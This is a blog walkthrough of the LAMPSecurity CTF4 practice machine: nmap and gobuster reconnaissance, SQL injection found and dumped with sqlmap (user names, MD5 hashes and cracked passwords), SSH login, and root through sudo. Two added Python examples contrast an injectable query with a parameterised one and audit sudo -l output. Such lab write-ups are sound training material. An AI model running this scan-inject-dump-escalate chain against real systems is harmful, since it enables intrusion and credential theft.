Host discovery + information gathering
nmap -sn 192.168.25.0/24
nmap --min-rate 10000 -p- $ip
PORT    STATE  SERVICE
22/tcp  open   ssh
25/tcp  open   smtp
80/tcp  open   http
631/tcp closed ipp
nmap -sT -sV -O -p22,25,80,631 $ip
PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 4.3 (protocol 2.0)
25/tcp  open   smtp    Sendmail 8.13.5/8.13.5
80/tcp  open   http    Apache httpd 2.2.0 ((Fedora))
631/tcp closed ipp
MAC Address: 00:0C:29:ED:D6:5F (VMware)
Device type: general purpose|proxy server|remote management|terminal server|switch|WAP
Running (JUST GUESSING): Linux 2.6.X|3.X|4.X (96%), SonicWALL embedded (93%), Control4 embedded (92%), Dell iDRAC 6 (92%), Lantronix embedded (92%), SNR embedded (92%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:sonicwall:aventail_ex-6000 cpe:/o:dell:idrac6_firmware cpe:/h:lantronix:slc_8 cpe:/h:snr:snr-s2960 cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel:4.1
Aggressive OS guesses: Linux 2.6.16 - 2.6.21 (96%), Linux 2.6.13 - 2.6.32 (95%), SonicWALL Aventail EX-6000 VPN appliance (93%), Linux 2.6.8 - 2.6.30 (92%), Control4 HC-300 home controller (92%), Linux 2.6.9 - 2.6.18 (92%), Dell iDRAC 6 remote access controller (Linux 2.6) (92%), Lantronix SLC 8 terminal server (Linux 2.6) (92%), SNR SNR-S2960 switch (92%), Linux 2.6.18 - 2.6.32 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: ctf4.sas.upenn.edu; OS: Unix
nmap --script=vuln -p22,25,80 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-12 11:23 CST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.25.139 (192.168.25.139)
Host is up (0.00038s latency).

PORT   STATE SERVICE
22/tcp open  ssh
25/tcp open  smtp
| smtp-vuln-cve2010-4344:
|_  The SMTP server is not Exim: NOT VULNERABLE
80/tcp open  http
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.25.139
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://192.168.25.139:80/
|     Form id:
|     Form action: /index.html?page=search&title=Search Results
|
|     Path: http://192.168.25.139:80/index.html?page=search&title=Search Results
|     Form id:
|     Form action: /index.html?page=search&title=Search Results
|
|     Path: http://192.168.25.139:80/index.html?title=Home Page
|     Form id:
|     Form action: /index.html?page=search&title=Search Results
|
|     Path: http://192.168.25.139:80/index.html?page=research&title=Research
|     Form id:
|     Form action: /index.html?page=search&title=Search Results
|
|     Path: http://192.168.25.139:80/index.html?page=contact&title=Contact
|     Form id:
|     Form action: /index.html?page=search&title=Search Results
|
|     Path: http://192.168.25.139:80/index.html?page=blog&title=Blog
|     Form id:
|     Form action: /index.html?page=search&title=Search Results
|
|     Path: http://192.168.25.139:80/?page=blog&title=Blog&id=2
|     Form id:
|     Form action: /index.html?page=search&title=Search Results
|
|     Path: http://192.168.25.139:80/?page=blog&title=Blog&id=5
|     Form id:
|     Form action: /index.html?page=search&title=Search Results
|
|     Path: http://192.168.25.139:80/?page=blog&title=Blog&id=6
|     Form id:
|     Form action: /index.html?page=search&title=Search Results
|
|     Path: http://192.168.25.139:80/?page=blog&title=Blog&id=7
|     Form id:
|_    Form action: /index.html?page=search&title=Search Results
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-sql-injection:
|   Possible sqli for queries:
|     http://192.168.25.139:80/?page=blog&title=Blog&id=2%27%20OR%20sqlspider
|     http://192.168.25.139:80/?page=blog&title=Blog&id=5%27%20OR%20sqlspider
|     http://192.168.25.139:80/?page=blog&title=Blog&id=6%27%20OR%20sqlspider
|_    http://192.168.25.139:80/?page=blog&title=Blog&id=7%27%20OR%20sqlspider
| http-enum:
|   /admin/: Possible admin folder
|   /admin/index.php: Possible admin folder
|   /admin/login.php: Possible admin folder
|   /admin/admin.php: Possible admin folder
|   /robots.txt: Robots file
|   /icons/: Potentially interesting directory w/ listing on 'apache/2.2.0 (fedora)'
|   /images/: Potentially interesting directory w/ listing on 'apache/2.2.0 (fedora)'
|   /inc/: Potentially interesting directory w/ listing on 'apache/2.2.0 (fedora)'
|   /pages/: Potentially interesting directory w/ listing on 'apache/2.2.0 (fedora)'
|   /restricted/: Potentially interesting folder (401 Authorization Required)
|   /sql/: Potentially interesting directory w/ listing on 'apache/2.2.0 (fedora)'
|_  /usage/: Potentially interesting folder
MAC Address: 00:0C:29:ED:D6:5F (VMware)
Web penetration testing
Visiting the web site

Directory brute-forcing
gobuster dir -u http://192.168.25.139/ --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
/images   (Status: 301) [Size: 316] [--> http://192.168.25.139/images/]
/pages    (Status: 301) [Size: 315] [--> http://192.168.25.139/pages/]
/calendar (Status: 301) [Size: 318] [--> http://192.168.25.139/calendar/]
/mail     (Status: 301) [Size: 314] [--> http://192.168.25.139/mail/]
/admin    (Status: 301) [Size: 315] [--> http://192.168.25.139/admin/]
/usage    (Status: 301) [Size: 315] [--> http://192.168.25.139/usage/]
/conf     (Status: 500) [Size: 617]
/inc      (Status: 301) [Size: 313] [--> http://192.168.25.139/inc/]
/sql      (Status: 301) [Size: 313] [--> http://192.168.25.139/sql/]
Try:
http://192.168.25.139/index.html?page=blog&title=Blog&id=2%27
Found a parameter injection point; blind SQL injection exists.

Admin login page

The image directory is exposed and reveals the server version number; the images themselves are of no use.


http://192.168.25.139/calendar/
Another admin login page

The search module
http://192.168.25.139/calendar/index.php?action=search&year=2025&month=1&day=11
Error-based SQL injection exists.


The login module
http://192.168.25.139/calendar/index.php?action=login&year=2025&month=1&day=11
An admin login exists.

SquirrelMail version 1.4.17 login

Sensitive database file exposed

use ehks;
create table user (
  user_id int not null auto_increment primary key,
  user_name varchar(20) not null,
  user_pass varchar(32) not null
);
create table blog (
  blog_id int primary key not null auto_increment,
  blog_title varchar(255),
  blog_body text,
  blog_date datetime not null
);
create table comment (
  comment_id int not null auto_increment primary key,
  comment_title varchar(50),
  comment_body text,
  comment_author varchar(50),
  comment_url varchar(50),
  comment_date datetime not null
);
This already exposes the database name, table names and column names, which makes the SQL injection attack far easier.
SQLmap
Automated SQL injection tool
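The single quote appended to the id parameter above produces a database error because the id is pasted straight into the SQL text. The following is an added example, not code from the CTF4 target or from the original post; it rebuilds the leaked blog table in an in-memory SQLite database (a constructed fixture, SQLite types standing in for MySQL's) and puts the concatenating lookup beside the parameterised one so the difference in behaviour on the same inputs can be checked.

```python
import sqlite3

def make_db():
    """Constructed fixture: the blog table from the leaked ehks schema,
    cut down to the columns a page-by-id lookup needs."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table blog (blog_id integer primary key, "
                 "blog_title text, blog_body text)")
    conn.executemany("insert into blog values (?, ?, ?)",
                     [(2, "Second post", "body"),
                      (5, "Fifth post", "body"),
                      (7, "Seventh post", "body")])
    return conn

def vulnerable_lookup(conn, raw_id):
    """The pattern behind ?page=blog&id=...: the raw parameter is spliced
    into the SQL string. A quote in raw_id reaches the SQL parser, so
    id=2' fails with a syntax error, which is exactly the error-based
    injection signal noted on the page."""
    sql = "select blog_title from blog where blog_id = '" + raw_id + "'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def safe_lookup(conn, raw_id):
    """Hardened form: check the type first, then bind the value as a
    parameter so the driver never lets it be interpreted as SQL."""
    if not raw_id.isdigit():
        return None  # reject anything that is not a plain integer id
    row = conn.execute("select blog_title from blog where blog_id = ?",
                       (int(raw_id),)).fetchone()
    return row[0] if row else None

def probe(conn, lookup, raw_id):
    """Reports ("ok", title) or ("error", message) for one input, which is
    what a tester sees in the response and what the server logs record."""
    try:
        return ("ok", lookup(conn, raw_id))
    except sqlite3.Error as exc:
        return ("error", str(exc))

if __name__ == "__main__":
    db = make_db()
    for raw in ("2", "2'"):
        print("vulnerable", raw, probe(db, vulnerable_lookup, raw))
        print("safe      ", raw, probe(db, safe_lookup, raw))
```

Matching the error in the web server or application logs (a quote in a numeric parameter followed by a database syntax error) is also the cheapest detection signature for probes of this kind.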
sqlmap -u "http://192.168.25.139/index.html?page=blog&title=Blog&id=2" --dbs --dump --batch

+---------+-----------+--------------------------------------------------+
| user_id | user_name | user_pass                                        |
+---------+-----------+--------------------------------------------------+
| 1       | dstevens  | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf)    |
| 2       | achen     | b46265f1e7faa3beab09db5c28739380 (seventysixers) |
| 3       | pmoore    | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite)      |
| 4       | jdurbin   | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978)       |
| 5       | sorzek    | 64d1f88b9b276aece4b0edcc25b7a434 (pacman)        |
| 6       | ghighland | 9f3eb3087298ff21843cc4e013cf355f (undone1)       |
+---------+-----------+--------------------------------------------------+
In the OSCP exam, however, sqlmap is not allowed; the blind injection has to be worked through by hand with Burp.
Try logging in with these accounts. There are three admin panels in total, and all of them can be tried.
The webmail panel; read the mail.


Found a key password: password1234

Password: undone + one digit
Trying SSH

Unable to negotiate with 192.168.25.139 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
No key exchange method matches; this is an SSH compatibility issue.
So we have to supply the missing SSH options,
filling them in according to the hint in the error message.

ssh -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 dstevens@192.168.25.139
Another prompt:

For the host key type, use the HostKeyAlgorithms option
ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 dstevens@192.168.25.139
Initial access obtained

Privilege escalation
Information gathering
id
whoami
ls
ip addr/ifconfig
pwd
sudo -l

Two ALLs: very high privileges.
Command:
sudo /bin/bash
This escalates directly to the root user.

Background
Explanation of sudo -l
sudo -l is a Linux command that lists the commands the current user is allowed to run through sudo.
When the output shows two ALLs:
(ALL) ALL
- The first ALL means the user may run commands as any possible identity (normally any user on the system); that is, the user can use sudo to act as any system user when running a command.
- The second ALL means the user may run every command through sudo, for example apt-get update (package management) or systemctl restart service (service management).
When the output shows three ALLs: root privileges.
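Reading the run-as part and the command part of each sudo -l line separately, as the explanation above does, is also how an audit of sudoers grants works. The following is an added example, not part of the original post and not part of sudo: it parses privilege lines in the format sudo -l prints and rates each one; the sample output is constructed, and the user name in it is a placeholder.

```python
import re

# One privilege line of `sudo -l` output: "(runas_user[ : runas_group]) [TAG: ...] commands"
# e.g. "(ALL) ALL", "(ALL : ALL) NOPASSWD: ALL", "(root) /usr/bin/less".
SPEC = re.compile(r"^\s*\((?P<user>[^:)]+?)\s*(?::\s*(?P<group>[^)]+?))?\)\s*"
                  r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

# Constructed sample of what `sudo -l` prints; "someuser" is a placeholder.
SAMPLE = """Matching Defaults entries for someuser on this host:
    env_reset

User someuser may run the following commands on this host:
    (ALL) ALL
    (ALL : ALL) NOPASSWD: ALL
    (root) /usr/bin/less, /usr/bin/vim
    (www-data) /usr/bin/tail
"""

def parse_spec(line):
    """Splits one privilege line into run-as user, run-as group, tags and commands."""
    m = SPEC.match(line)
    if not m:
        return None  # header lines and Defaults entries do not start with "("
    tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
    return {
        "runas_user": m.group("user").strip(),
        "runas_group": (m.group("group") or "").strip() or None,
        "nopasswd": "NOPASSWD" in tags,
        "commands": [c.strip() for c in m.group("cmds").split(",")],
    }

def classify(spec):
    """Rates a parsed spec. The first ALL (run-as) decides whether root is
    reachable; the second ALL (commands) decides whether any command is."""
    as_root = spec["runas_user"] in ("ALL", "root")
    any_cmd = "ALL" in spec["commands"]
    if as_root and any_cmd:
        return "full-root"               # the "(ALL) ALL" case on this page
    if as_root:
        return "root-restricted-commands"
    return "non-root"

def audit(output):
    """Runs over a captured `sudo -l` block; returns (line, rating) pairs."""
    return [(ln.strip(), classify(parse_spec(ln)))
            for ln in output.splitlines() if parse_spec(ln)]

if __name__ == "__main__":
    for line, rating in audit(SAMPLE):
        print(f"{rating:24} {line}")
```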
Unless otherwise stated, all articles on this blog are the author's original work.
If you repost, please cite the source: https://www.oneblanks.xyz/lampsecurityctf4%e9%9d%b6%e6%9c%ba%e7%bb%83%e4%b9%a0/